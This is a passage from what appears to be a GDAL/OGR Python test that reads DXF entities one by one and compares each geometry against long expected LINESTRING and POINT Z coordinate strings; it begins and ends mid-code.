feat.DumpReadable()
return 'fail'
# OGRFeature(entities):49
# EntityHandle (String) = 1F3
# LINESTRING (-3.25 -0.5,-3.07367580370539 -0.493674033614862,-2.89709873733542 -0.487853807380434,-2.72001593081474 -0.483045061447428,-2.542174514068 -0.479753535966554,-2.36332161701984 -0.478484971088521,-2.1832043695949 -0.479745106964042,-2.00156990171783 -0.484039683743825,-1.81816534331327 -0.491874441578583,-1.63273782430587 -0.503755120619026,-1.44503447462027 -0.520187461015863,-1.25480242418112 -0.541677202919806,-1.06178880291306 -0.568730086481565,-0.865740740740739 -0.601851851851852,-0.666405367588798 -0.641548239181375,-0.463529813381883 -0.688324988620846,-0.256861208044639 -0.742687840320976,-0.04614668150171 -0.805142534432475,0.168866636322258 -0.876194811106053,0.388431615502622 -0.956350410492422,0.612790589861596 -1.04609400023601,0.841943559399181 -1.14542558033682,1.07564819029316 -1.25386048315042,1.31365161246818 -1.3708929685261,1.55570095584888 -1.49601729631315,1.80154335035992 -1.62872772636086,2.05092592592592 -1.76851851851852,2.30359581247155 -1.91488393263541,2.55930013992144 -2.06731822856083,2.81778603820024 -2.22531566614407,3.07880063723259 -2.38837050523441,3.34209106694314 -2.55597700568115,3.60740445725653 -2.72762942733357,3.87448793809741 -2.90282203004097,4.14308863939042 -3.08104907365262,4.4129536910602 -3.26180481801784,4.68383022303141 -3.44458352298589,4.95546536522868 -3.62887944840608,5.22760624757667 -3.81418685412768,5.5 -4.0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (-3.25 -0.5,-3.07367580370539 -0.493674033614862,-2.89709873733542 -0.487853807380434,-2.72001593081474 -0.483045061447428,-2.542174514068 -0.479753535966554,-2.36332161701984 -0.478484971088521,-2.1832043695949 -0.479745106964042,-2.00156990171783 -0.484039683743825,-1.81816534331327 -0.491874441578583,-1.63273782430587 -0.503755120619026,-1.44503447462027 -0.520187461015863,-1.25480242418112 -0.541677202919806,-1.06178880291306 -0.568730086481565,-0.865740740740739 -0.601851851851852,-0.666405367588798 -0.641548239181375,-0.463529813381883 -0.688324988620846,-0.256861208044639 -0.742687840320976,-0.04614668150171 -0.805142534432475,0.168866636322258 -0.876194811106053,0.388431615502622 -0.956350410492422,0.612790589861596 -1.04609400023601,0.841943559399181 -1.14542558033682,1.07564819029316 -1.25386048315042,1.31365161246818 -1.3708929685261,1.55570095584888 -1.49601729631315,1.80154335035992 -1.62872772636086,2.05092592592592 -1.76851851851852,2.30359581247155 -1.91488393263541,2.55930013992144 -2.06731822856083,2.81778603820024 -2.22531566614407,3.07880063723259 -2.38837050523441,3.34209106694314 -2.55597700568115,3.60740445725653 -2.72762942733357,3.87448793809741 -2.90282203004097,4.14308863939042 -3.08104907365262,4.4129536910602 -3.26180481801784,4.68383022303141 -3.44458352298589,4.95546536522868 -3.62887944840608,5.22760624757667 -3.81418685412768,5.5 -4.0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):50
# EntityHandle (String) = 1F4
# POINT Z (1.75 -3.5 -9.09326673973661)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (1.75 -3.5 -9.09326673973661)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):51
# EntityHandle (String) = 1F5
# POINT Z (5.5 1.0 -0.866025403784439)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (5.5 1.0 -0.866025403784439)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):52
# EntityHandle (String) = 1F6
# LINESTRING Z (0 0 0,1.375 0.25 -0.21650635094611)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0 0 0,1.375 0.25 -0.21650635094611)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):53
# EntityHandle (String) = 1F7
# LINESTRING Z (1.375 0.25 -0.21650635094611,2.0 1.0 -9.68245836551854e-17,2.125 -0.25 -0.649519052838329,1.375 0.25 -0.21650635094611)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (1.375 0.25 -0.21650635094611,2.0 1.0 -9.68245836551854e-17,2.125 -0.25 -0.649519052838329,1.375 0.25 -0.21650635094611)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):54
# EntityHandle (String) = 1F8
# LINESTRING Z (1.375 0.25 -0.21650635094611,2.125 -0.25 -0.649519052838329,2.75 0.5 -0.43301270189222,1.375 0.25 -0.21650635094611)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (1.375 0.25 -0.21650635094611,2.125 -0.25 -0.649519052838329,2.75 0.5 -0.43301270189222,1.375 0.25 -0.21650635094611)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):55
# EntityHandle (String) = 1FD
# LINESTRING Z (3.71114561800017 0.105572809000085 -0.866025403784439,3.77009625337411 -0.001434563330173 -0.933566819059727,3.83747480591229 -0.103563047131737 -1.00077917934903,3.91295301407961 -0.200315082697444 -1.06733503278919,3.99616315563294 -0.2912193038355 -1.13291012595241,4.08669983912687 -0.37583283431818 -1.19718498357639,4.18412197894014 -0.453743445530294 -1.25984646501566,4.28795494420042 -0.524571564805566 -1.32058928983137,4.39769287113821 -0.587972124666501 -1.37911752508686,4.51280112760429 -0.643636243958462 -1.43514602710321,4.6327189177438 -0.691292732687594 -1.48840183065055,4.75686201413727 -0.730709413231224 -1.53862547880726,4.88462560409789 -0.761694251483893 -1.58557228700798,5.01538723625813 -0.784096292428219 -1.62901353512224,5.14850985309022 -0.797806395572568 -1.66873758175591,5.28334489458639 -0.802757766672552 -1.70455089534686,5.41923545797803 -0.798926283145887 -1.7362789970312,5.55551949809999 -0.786330611595171 -1.76376731068683,5.691533052808 -0.76503211686609 -1.78688191601273,5.82661347773556 -0.735134563084044 -1.80551020097523,5.96010267463067 -0.69678360812577 -1.8195614104425,6.09135029754434 -0.650166093988798 -1.82896708833443,6.2197169212507 -0.595509136516029 -1.83368141113379,6.34457715646241 -0.533079018910172 -1.83368141113379,6.46532269666444 -0.463179894428748 -1.82896708833443,6.58136528172222 -0.386152304579996 -1.8195614104425,6.69213956382591 -0.302371520038872 -1.80551020097523,6.79710586180808 -0.212245712366048 -1.78688191601273,6.89575279041615 -0.116213965437088 -1.76376731068683,6.9875997517299 -0.014744136269953 -1.7362789970312,7.07219927658622 0.091669424327363 -1.70455089534686,7.14913920460393 0.202508280184287 -1.66873758175591,7.2180446921877 0.317232435536567 -1.62901353512224,7.27858003872839 0.435282965831356 -1.58557228700798,7.33045032210263 0.556084740751457 -1.53862547880726,7.37340283550381 0.679049226192411 -1.48840183065055,7.4072283186042 0.803577351541497 
-1.43514602710321,7.43176197705028 0.929062428289537 -1.37911752508686,7.44688428532421 1.05489310575633 -1.32058928983137,7.45252156906016 1.18045634952971 -1.25984646501566,7.44864636397843 1.3051404281076 -1.19718498357639,7.43527754968864 1.42833789319235 -1.13291012595241,7.41248025771019 1.54944853911785 -1.06733503278919,7.38036555415802 1.66788232699113 -1.00077917934903,7.33908989863968 1.78306225930261 -0.933566819059728,7.28885438199984 1.89442719099992 -0.86602540378444,
# 7.2299037466259 2.00143456333018 -0.798483988509152,7.16252519408772 2.10356304713174 -0.731271628219845,7.08704698592039 2.20031508269745 -0.664715774779688,7.00383684436707 2.2912193038355 -0.599140681616468,6.91330016087314 2.37583283431818 -0.534865823992492,6.81587802105987 2.4537434455303 -0.472204342553219,6.71204505579959 2.52457156480557 -0.411461517737508,6.6023071288618 2.5879721246665 -0.352933282482017,6.48719887239572 2.64363624395846 -0.296904780465671,6.36728108225621 2.6912927326876 -0.24364897691833,6.24313798586274 2.73070941323123 -0.19342532876162,6.11537439590212 2.7616942514839 -0.146478520560899,5.98461276374187 2.78409629242822 -0.103037272446642,5.85149014690979 2.79780639557257 -0.0633132258129652,5.71665510541362 2.80275776667256 -0.0274999122220189,5.58076454202198 2.79892628314589 0.00422818946232298,5.44448050190002 2.78633061159517 0.0317165031179519,5.30846694719201 2.76503211686609 0.0548311084438533,5.17338652226444 2.73513456308405 0.0734593934063514,5.03989732536933 2.69678360812577 0.0875106028736174,4.90864970245567 2.6501660939888 0.0969162807655497,4.78028307874931 2.59550913651603 0.101630603564914,4.6554228435376 2.53307901891017 0.101630603564914,4.53467730333557 2.46317989442875 0.0969162807655497,4.41863471827779 2.38615230458 0.0875106028736175,4.3078604361741 2.30237152003888 0.0734593934063515,4.20289413819193 2.21224571236605 0.0548311084438534,4.10424720958385 2.11621396543709 0.031716503117952,4.01240024827011 2.01474413626996 0.00422818946232319,3.92780072341379 1.90833057567264 -0.0274999122220187,3.85086079539608 1.79749171981572 -0.0633132258129645,3.7819553078123 1.68276756446344 -0.103037272446642,3.72141996127162 1.56471703416865 -0.146478520560898,3.66954967789738 1.44391525924855 -0.19342532876162,3.6265971644962 1.32095077380759 -0.243648976918329,3.5927716813958 1.19642264845851 -0.296904780465671,3.56823802294973 1.07093757171047 -0.352933282482016,3.5531157146758 0.945106894243672 
-0.411461517737508,3.54747843093985 0.819543650470287 -0.472204342553219,3.55135363602158 0.694859571892403 -0.534865823992493,3.56472245031136 0.571662106807651 -0.599140681616467,3.58751974228981 0.450551460882157 -0.664715774779687,3.61963444584198 0.332117673008871 -0.731271628219845,3.66091010136033 0.216937740697387 -0.798483988509152,3.71114561800017 0.105572809000085 -0.866025403784439)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (3.71114561800017 0.105572809000085 -0.866025403784439,3.77009625337411 -0.001434563330173 -0.933566819059727,3.83747480591229 -0.103563047131737 -1.00077917934903,3.91295301407961 -0.200315082697444 -1.06733503278919,3.99616315563294 -0.2912193038355 -1.13291012595241,4.08669983912687 -0.37583283431818 -1.19718498357639,4.18412197894014 -0.453743445530294 -1.25984646501566,4.28795494420042 -0.524571564805566 -1.32058928983137,4.39769287113821 -0.587972124666501 -1.37911752508686,4.51280112760429 -0.643636243958462 -1.43514602710321,4.6327189177438 -0.691292732687594 -1.48840183065055,4.75686201413727 -0.730709413231224 -1.53862547880726,4.88462560409789 -0.761694251483893 -1.58557228700798,5.01538723625813 -0.784096292428219 -1.62901353512224,5.14850985309022 -0.797806395572568 -1.66873758175591,5.28334489458639 -0.802757766672552 -1.70455089534686,5.41923545797803 -0.798926283145887 -1.7362789970312,5.55551949809999 -0.786330611595171 -1.76376731068683,5.691533052808 -0.76503211686609 -1.78688191601273,5.82661347773556 -0.735134563084044 -1.80551020097523,5.96010267463067 -0.69678360812577 -1.8195614104425,6.09135029754434 -0.650166093988798 -1.82896708833443,6.2197169212507 -0.595509136516029 -1.83368141113379,6.34457715646241 -0.533079018910172 -1.83368141113379,6.46532269666444 -0.463179894428748 -1.82896708833443,6.58136528172222 -0.386152304579996 -1.8195614104425,6.69213956382591 -0.302371520038872 -1.80551020097523,6.79710586180808 -0.212245712366048 -1.78688191601273,6.89575279041615 -0.116213965437088 -1.76376731068683,6.9875997517299 -0.014744136269953 -1.7362789970312,7.07219927658622 0.091669424327363 -1.70455089534686,7.14913920460393 0.202508280184287 -1.66873758175591,7.2180446921877 0.317232435536567 -1.62901353512224,7.27858003872839 0.435282965831356 -1.58557228700798,7.33045032210263 0.556084740751457 -1.53862547880726,7.37340283550381 0.679049226192411 -1.48840183065055,7.4072283186042 
0.803577351541497 -1.43514602710321,7.43176197705028 0.929062428289537 -1.37911752508686,7.44688428532421 1.05489310575633 -1.32058928983137,7.45252156906016 1.18045634952971 -1.25984646501566,7.44864636397843 1.3051404281076 -1.19718498357639,7.43527754968864 1.42833789319235 -1.13291012595241,7.41248025771019 1.54944853911785 -1.06733503278919,7.38036555415802 1.66788232699113 -1.00077917934903,7.33908989863968 1.78306225930261 -0.933566819059728,7.28885438199984 1.89442719099992 -0.86602540378444,7.2299037466259 2.00143456333018 -0.798483988509152,7.16252519408772 2.10356304713174 -0.731271628219845,7.08704698592039 2.20031508269745 -0.664715774779688,' + \
'7.00383684436707 2.2912193038355 -0.599140681616468,6.91330016087314 2.37583283431818 -0.534865823992492,6.81587802105987 2.4537434455303 -0.472204342553219,6.71204505579959 2.52457156480557 -0.411461517737508,6.6023071288618 2.5879721246665 -0.352933282482017,6.48719887239572 2.64363624395846 -0.296904780465671,6.36728108225621 2.6912927326876 -0.24364897691833,6.24313798586274 2.73070941323123 -0.19342532876162,6.11537439590212 2.7616942514839 -0.146478520560899,5.98461276374187 2.78409629242822 -0.103037272446642,5.85149014690979 2.79780639557257 -0.0633132258129652,5.71665510541362 2.80275776667256 -0.0274999122220189,5.58076454202198 2.79892628314589 0.00422818946232298,5.44448050190002 2.78633061159517 0.0317165031179519,5.30846694719201 2.76503211686609 0.0548311084438533,5.17338652226444 2.73513456308405 0.0734593934063514,5.03989732536933 2.69678360812577 0.0875106028736174,4.90864970245567 2.6501660939888 0.0969162807655497,4.78028307874931 2.59550913651603 0.101630603564914,4.6554228435376 2.53307901891017 0.101630603564914,4.53467730333557 2.46317989442875 0.0969162807655497,4.41863471827779 2.38615230458 0.0875106028736175,4.3078604361741 2.30237152003888 0.0734593934063515,4.20289413819193 2.21224571236605 0.0548311084438534,4.10424720958385 2.11621396543709 0.031716503117952,4.01240024827011 2.01474413626996 0.00422818946232319,3.92780072341379 1.90833057567264 -0.0274999122220187,3.85086079539608 1.79749171981572 -0.0633132258129645,3.7819553078123 1.68276756446344 -0.103037272446642,3.72141996127162 1.56471703416865 -0.146478520560898,3.66954967789738 1.44391525924855 -0.19342532876162,3.6265971644962 1.32095077380759 -0.243648976918329,3.5927716813958 1.19642264845851 -0.296904780465671,3.56823802294973 1.07093757171047 -0.352933282482016,3.5531157146758 0.945106894243672 -0.411461517737508,3.54747843093985 0.819543650470287 -0.472204342553219,3.55135363602158 0.694859571892403 -0.534865823992493,3.56472245031136 0.571662106807651 
-0.599140681616467,3.58751974228981 0.450551460882157 -0.664715774779687,3.61963444584198 0.332117673008871 -0.731271628219845,3.66091010136033 0.216937740697387 -0.798483988509152,3.71114561800017 0.105572809000085 -0.866025403784439)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):56
# EntityHandle (String) = 1FE
# LINESTRING Z (4.25 -0.5 -1.29903810567666,5.5 1.0 -0.866025403784439)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (4.25 -0.5 -1.29903810567666,5.5 1.0 -0.866025403784439)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):57
# EntityHandle (String) = 1FF
# LINESTRING Z (5.5 1.0 -0.866025403784439,6.75 2.5 -0.43301270189222)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (5.5 1.0 -0.866025403784439,6.75 2.5 -0.43301270189222)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):58
# EntityHandle (String) = 200
# LINESTRING Z (4.75 1.5 -0.43301270189222,5.5 1.0 -0.866025403784439)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (4.75 1.5 -0.43301270189222,5.5 1.0 -0.866025403784439)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):59
# EntityHandle (String) = 201
# LINESTRING Z (5.5 1.0 -0.866025403784439,6.25 0.5 -1.29903810567666)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (5.5 1.0 -0.866025403784439,6.25 0.5 -1.29903810567666)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):60
# EntityHandle (String) = 202
# LINESTRING Z (4.25 -0.5 -1.29903810567666,4.30536229248331 -0.531224312261799 -1.32818874766841,4.36654473979309 -0.554988653592388 -1.35508777630525,4.43324926719606 -0.571177246509588 -1.37960414222355,4.50515089693985 -0.579711221815978 -1.40161840415293,4.58189933151187 -0.580549002841697 -1.42102331082214,4.6631206602536 -0.573686508001801 -1.43772432347645,4.74841918101576 -0.559157170681335 -1.451640076461,4.83737932797937 -0.53703177635124 -1.46270277362604,4.92956769625067 -0.507418117708657 -1.47085851862302,5.02453515336618 -0.470460469521736 -1.47606757748212,5.12181902742094 -0.426338885737475 -1.47830457219218,5.22094536115948 -0.375268322276984 -1.47755860433986,5.32143122104797 -0.317497589791849 -1.47383330820552,5.42278705007785 -0.253308141483641 -1.46714683305749,5.52451905283833 -0.183012701892219 -1.45753175473055,5.62613160123803 -0.106953743333199 -1.44503491691981,5.7271296491552 -0.025501817407262 -1.42971720296291,5.82702114425268 0.060946250290002 -1.41165323922251,5.92531942520741 0.151969293462501 -1.39093103151418,6.02154559267549 0.247123856993501 -1.36765153635088,6.11523084244164 0.345946357414384 -1.34192816909299,6.2059187493862 0.4479553414367 -1.31388625140011,6.29316749114245 0.552653831544204 -1.28366240067645,6.37655200061077 0.659531747217344 -1.25140386448466,6.45566603684282 0.768068389994292 -1.21726780317044,6.53012416420658 0.877734980261504 -1.18142052419318,6.59956363019005 0.987997233414845 -1.1440366718927,6.66364613269498 1.09831796284048 -1.10529837663958,6.72205946821072 1.20815969703403 -1.06539436751435,6.77451905283833 1.31698729810778 -1.02451905283833,6.82076930875472 1.4242705689286 -0.982871573035841,6.86058490936212 1.52948683618513 -0.940654830442097,6.89377187705662 1.63212349679959 -0.898074500783399,6.92016852826756 1.73168051527848 -0.855338031145687,6.93964626116363 1.8276728598352 -0.81265362931318,6.95211018218804 1.91963286541618 -0.770229249400985,6.95749956837044 2.00711251211804 
-0.72827157872355,6.95578816316308 2.08968560789544 -0.686985030834846,6.9469843043601 2.166949864926 -0.646570749646076,6.93113088347664 2.23852885951603 -0.607225629472764,6.90830513678565 2.30407386599898 -0.569141355785437,6.87861826903058 2.36326555569183 -0.53250347133728,6.84221491164701 2.41581555263232 -0.497490472218499,6.79927241813288 2.46146783851767 -0.464272938241304,6.75 2.5 -0.43301270189222,6.69463770751669 2.5312243122618 -0.40386205990047,6.63345526020692 2.55498865359239 -0.376963031263626,
# 6.56675073280394 2.57117724650959 -0.352446665345325,6.49484910306015 2.57971122181598 -0.330432403415945,6.41810066848813 2.5805490028417 -0.311027496746741,6.3368793397464 2.5736865080018 -0.294326484092429,6.25158081898424 2.55915717068134 -0.280410731107883,6.16262067202063 2.53703177635124 -0.269348033942836,6.07043230374933 2.50741811770866 -0.261192288945857,5.97546484663382 2.47046046952174 -0.255983230086761,5.87818097257907 2.42633888573748 -0.253746235376694,5.77905463884053 2.37526832227698 -0.254492203229023,5.67856877895203 2.31749758979185 -0.258217499363356,5.57721294992215 2.25330814148364 -0.264903974511391,5.47548094716167 2.18301270189222 -0.27451905283833,5.37386839876197 2.1069537433332 -0.287015890649068,5.2728703508448 2.02550181740726 -0.302333604605968,5.17297885574732 1.93905374971 -0.320397568346365,5.07468057479259 1.8480307065375 -0.341119776054697,4.97845440732451 1.7528761430065 -0.364399271218,4.88476915755836 1.65405364258562 -0.390122638475884,4.79408125061381 1.5520446585633 -0.418164556168773,4.70683250885755 1.4473461684558 -0.44838840689243,4.62344799938923 1.34046825278266 -0.48064694308422,4.54433396315718 1.23193161000571 -0.514783004398435,4.46987583579342 1.1222650197385 -0.550630283375696,4.40043636980995 1.01200276658516 -0.588014135676182,4.33635386730502 0.901682037159526 -0.626752430929296,4.27794053178928 0.791840302965968 -0.666656440054525,4.22548094716167 0.68301270189222 -0.707531754730549,4.17923069124529 0.575729431071401 -0.749179234533037,4.13941509063789 0.470513163814874 -0.791395977126782,4.10622812294338 0.36787650320041 -0.833976306785479,4.07983147173244 0.268319484721523 -0.876712776423191,4.06035373883638 0.172327140164803 -0.919397178255699,4.04788981781196 0.080367134583816 -0.961821558167894,4.04250043162957 -0.007112512118036 -1.00377922884533,4.04421183683692 -0.089685607895445 -1.04506577673403,4.0530156956399 -0.166949864926001 -1.0854800579228,4.06886911652336 -0.238528859516028 
-1.12482517809611,4.09169486321435 -0.304073865998978 -1.16290945178344,4.12138173096942 -0.363265555691829 -1.1995473362316,4.15778508835299 -0.415815552632322 -1.23456033535038,4.20072758186713 -0.461467838517673 -1.26777786932757,4.25 -0.5 -1.29903810567666)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (4.25 -0.5 -1.29903810567666,4.30536229248331 -0.531224312261799 -1.32818874766841,4.36654473979309 -0.554988653592388 -1.35508777630525,4.43324926719606 -0.571177246509588 -1.37960414222355,4.50515089693985 -0.579711221815978 -1.40161840415293,4.58189933151187 -0.580549002841697 -1.42102331082214,4.6631206602536 -0.573686508001801 -1.43772432347645,4.74841918101576 -0.559157170681335 -1.451640076461,4.83737932797937 -0.53703177635124 -1.46270277362604,4.92956769625067 -0.507418117708657 -1.47085851862302,5.02453515336618 -0.470460469521736 -1.47606757748212,5.12181902742094 -0.426338885737475 -1.47830457219218,5.22094536115948 -0.375268322276984 -1.47755860433986,5.32143122104797 -0.317497589791849 -1.47383330820552,5.42278705007785 -0.253308141483641 -1.46714683305749,5.52451905283833 -0.183012701892219 -1.45753175473055,5.62613160123803 -0.106953743333199 -1.44503491691981,5.7271296491552 -0.025501817407262 -1.42971720296291,5.82702114425268 0.060946250290002 -1.41165323922251,5.92531942520741 0.151969293462501 -1.39093103151418,6.02154559267549 0.247123856993501 -1.36765153635088,6.11523084244164 0.345946357414384 -1.34192816909299,6.2059187493862 0.4479553414367 -1.31388625140011,6.29316749114245 0.552653831544204 -1.28366240067645,6.37655200061077 0.659531747217344 -1.25140386448466,6.45566603684282 0.768068389994292 -1.21726780317044,6.53012416420658 0.877734980261504 -1.18142052419318,6.59956363019005 0.987997233414845 -1.1440366718927,6.66364613269498 1.09831796284048 -1.10529837663958,6.72205946821072 1.20815969703403 -1.06539436751435,6.77451905283833 1.31698729810778 -1.02451905283833,6.82076930875472 1.4242705689286 -0.982871573035841,6.86058490936212 1.52948683618513 -0.940654830442097,6.89377187705662 1.63212349679959 -0.898074500783399,6.92016852826756 1.73168051527848 -0.855338031145687,6.93964626116363 1.8276728598352 -0.81265362931318,6.95211018218804 1.91963286541618 
-0.770229249400985,6.95749956837044 2.00711251211804 -0.72827157872355,6.95578816316308 2.08968560789544 -0.686985030834846,6.9469843043601 2.166949864926 -0.646570749646076,6.93113088347664 2.23852885951603 -0.607225629472764,6.90830513678565 2.30407386599898 -0.569141355785437,6.87861826903058 2.36326555569183 -0.53250347133728,6.84221491164701 2.41581555263232 -0.497490472218499,6.79927241813288 2.46146783851767 -0.464272938241304,6.75 2.5 -0.43301270189222,6.69463770751669 2.5312243122618 -0.40386205990047,' + \
'6.63345526020692 2.55498865359239 -0.376963031263626,6.56675073280394 2.57117724650959 -0.352446665345325,6.49484910306015 2.57971122181598 -0.330432403415945,6.41810066848813 2.5805490028417 -0.311027496746741,6.3368793397464 2.5736865080018 -0.294326484092429,6.25158081898424 2.55915717068134 -0.280410731107883,6.16262067202063 2.53703177635124 -0.269348033942836,6.07043230374933 2.50741811770866 -0.261192288945857,5.97546484663382 2.47046046952174 -0.255983230086761,5.87818097257907 2.42633888573748 -0.253746235376694,5.77905463884053 2.37526832227698 -0.254492203229023,5.67856877895203 2.31749758979185 -0.258217499363356,5.57721294992215 2.25330814148364 -0.264903974511391,5.47548094716167 2.18301270189222 -0.27451905283833,5.37386839876197 2.1069537433332 -0.287015890649068,5.2728703508448 2.02550181740726 -0.302333604605968,5.17297885574732 1.93905374971 -0.320397568346365,5.07468057479259 1.8480307065375 -0.341119776054697,4.97845440732451 1.7528761430065 -0.364399271218,4.88476915755836 1.65405364258562 -0.390122638475884,4.79408125061381 1.5520446585633 -0.418164556168773,4.70683250885755 1.4473461684558 -0.44838840689243,4.62344799938923 1.34046825278266 -0.48064694308422,4.54433396315718 1.23193161000571 -0.514783004398435,4.46987583579342 1.1222650197385 -0.550630283375696,4.40043636980995 1.01200276658516 -0.588014135676182,4.33635386730502 0.901682037159526 -0.626752430929296,4.27794053178928 0.791840302965968 -0.666656440054525,4.22548094716167 0.68301270189222 -0.707531754730549,4.17923069124529 0.575729431071401 -0.749179234533037,4.13941509063789 0.470513163814874 -0.791395977126782,4.10622812294338 0.36787650320041 -0.833976306785479,4.07983147173244 0.268319484721523 -0.876712776423191,4.06035373883638 0.172327140164803 -0.919397178255699,4.04788981781196 0.080367134583816 -0.961821558167894,4.04250043162957 -0.007112512118036 -1.00377922884533,4.04421183683692 -0.089685607895445 -1.04506577673403,4.0530156956399 -0.166949864926001 
-1.0854800579228,4.06886911652336 -0.238528859516028 -1.12482517809611,4.09169486321435 -0.304073865998978 -1.16290945178344,4.12138173096942 -0.363265555691829 -1.1995473362316,4.15778508835299 -0.415815552632322 -1.23456033535038,4.20072758186713 -0.461467838517673 -1.26777786932757,4.25 -0.5 -1.29903810567666)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):61
# EntityHandle (String) = 203
# LINESTRING Z (2.75 0.5 -0.43301270189222,2.75597796157458 0.457022294808167 -0.455760312055479,2.76522760095779 0.414850974295674 -0.478918395607368,2.77770451483146 0.37368848382115 -0.502375781105475,2.79334880719819 0.333732425808347 -0.526019860294666,2.81208537691484 0.295174611146642 -0.549737128688177,2.83382427821898 0.258200138394064 -0.573413730451116,2.85846115251769 0.222986505203176 -0.596936004970611,2.88587772936573 0.189702756235451 -0.620191032488805,2.91594239422828 0.15850867165462 -0.643067176179329,2.94851082030252 0.129554000094665 -0.66545461806501,2.98342666136509 0.102977739784634 -0.687245886204105,3.02052230231928 0.078907471281269 -0.708336370614292,3.05961966383903 0.057458745012683 -0.728624825457685,3.10053105724686 0.038734526573237 -0.748013855076124,3.14306008552201 0.022824702432479 -0.766410381543502,3.18700258611332 0.009805648431019 -0.783726091490617,3.23214761103096 -0.00026013686519 -0.79987786005755,3.27827843951188 -0.007324332192091 -0.814788149938374,3.32517361839783 -0.011353025555964 -0.828385383602543,3.37260802523135 -0.012326877029509 -0.84060428690611,3.42035394896652 -0.010241211594056 -0.851386202443257,3.46818218310621 -0.0051060415822 -0.860679371133851,3.51586312601842 0.003053981386852 -0.868439180695292,3.56316788314946 0.014199684748517 -0.874628379805819,3.60986936584274 0.028277563042523 -0.879217256931186,3.65574338148826 0.045220034768334 -0.882183782956251,3.70056970976957 0.064945766813234 -0.883513716936746,3.74413315984144 0.087360064895672 -0.883200674463593,3.78622460336345 0.112355328149502 -0.881246158311542,3.82664197843012 0.139811565666877 -0.87765955122504,3.86519125957839 0.169596972520106 -0.872458070875934,3.90168738921576 0.201568562497258 -0.865666687209244,3.93595516599773 0.235572854514029 -0.857318002573801,3.96783008588991 0.271446609406727 -0.847452095213172,3.99715913187718 0.30901761356937 -0.836116326868217,4.02380150852887 0.348105505672996 -0.823365115414876,4.04762931789371 
0.3885226424985 -0.809259673628662,4.06852817347981 0.430074999726512 -0.793867715329923,4.08639774937224 0.472563103360048 -0.777263130320539,4.10115226185219 0.515782987308575 -0.759525629672545,4.1127208812057 0.559527172536592 -0.740740363071464,4.12104807174486 0.603585663076254 -0.720997510051345,4.12609385840951 0.647746954122649 -0.700391847083764,4.1278340186693 0.691799047372318 -0.679022292599034,4.12626019880507 0.735530468730831 -0.656991432123733,4.12137995401128 0.778731283503886 -0.634405025814187,4.11321671212692 0.821194104198432 -0.61137150074998,4.10180966116915 0.862715086095846 -0.588001430424789,4.08721356120934 0.903094905817856 -0.564407003933257,4.06949848149492 0.942139718187561 -0.540701487402092,4.04874946407869 0.979662086792094 -0.516998680250836,4.02506611557057 1.01548188377972 -0.493412368892526,3.99856212897149 1.04942715457186 -0.470055780496802,3.96936473788492 1.08133494333891 -0.447041039437686,3.93761410572614 1.11105207527721 -0.424478629035376,3.9034626528613 1.13843589193168 -0.402476861176005,3.86707432490649 1.16335493603432 -0.381141356355458,3.8286238056993 1.1856895825708 -0.360574536643342,3.78829567872099 1.20533261304587 -0.340875134001137,3.74628354099508 1.22218973019068 -0.322137716314888,3.70278907371594 1.23618001064108 -0.304452233417734,3.65802107406893 1.247236293414 -0.287903585281599,3.61219445288998 1.25530550231681 -0.27257121445099,3.56552920297626 1.26034890074202 -0.258528724675415,3.51824934300062 1.26234227762414 -0.245843527571206,3.47058184209972 1.26127606366599 -0.234576519008966,3.42275553029828 1.2571553772766 -0.224781786780142,3.375 1.25 -0.21650635094611)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2.75 0.5 -0.43301270189222,2.75597796157458 0.457022294808167 -0.455760312055479,2.76522760095779 0.414850974295674 -0.478918395607368,2.77770451483146 0.37368848382115 -0.502375781105475,2.79334880719819 0.333732425808347 -0.526019860294666,2.81208537691484 0.295174611146642 -0.549737128688177,2.83382427821898 0.258200138394064 -0.573413730451116,2.85846115251769 0.222986505203176 -0.596936004970611,2.88587772936573 0.189702756235451 -0.620191032488805,2.91594239422828 0.15850867165462 -0.643067176179329,2.94851082030252 0.129554000094665 -0.66545461806501,2.98342666136509 0.102977739784634 -0.687245886204105,3.02052230231928 0.078907471281269 -0.708336370614292,3.05961966383903 0.057458745012683 -0.728624825457685,3.10053105724686 0.038734526573237 -0.748013855076124,3.14306008552201 0.022824702432479 -0.766410381543502,3.18700258611332 0.009805648431019 -0.783726091490617,3.23214761103096 -0.00026013686519 -0.79987786005755,3.27827843951188 -0.007324332192091 -0.814788149938374,3.32517361839783 -0.011353025555964 -0.828385383602543,3.37260802523135 -0.012326877029509 -0.84060428690611,3.42035394896652 -0.010241211594056 -0.851386202443257,3.46818218310621 -0.0051060415822 -0.860679371133851,3.51586312601842 0.003053981386852 -0.868439180695292,3.56316788314946 0.014199684748517 -0.874628379805819,3.60986936584274 0.028277563042523 -0.879217256931186,3.65574338148826 0.045220034768334 -0.882183782956251,3.70056970976957 0.064945766813234 -0.883513716936746,3.74413315984144 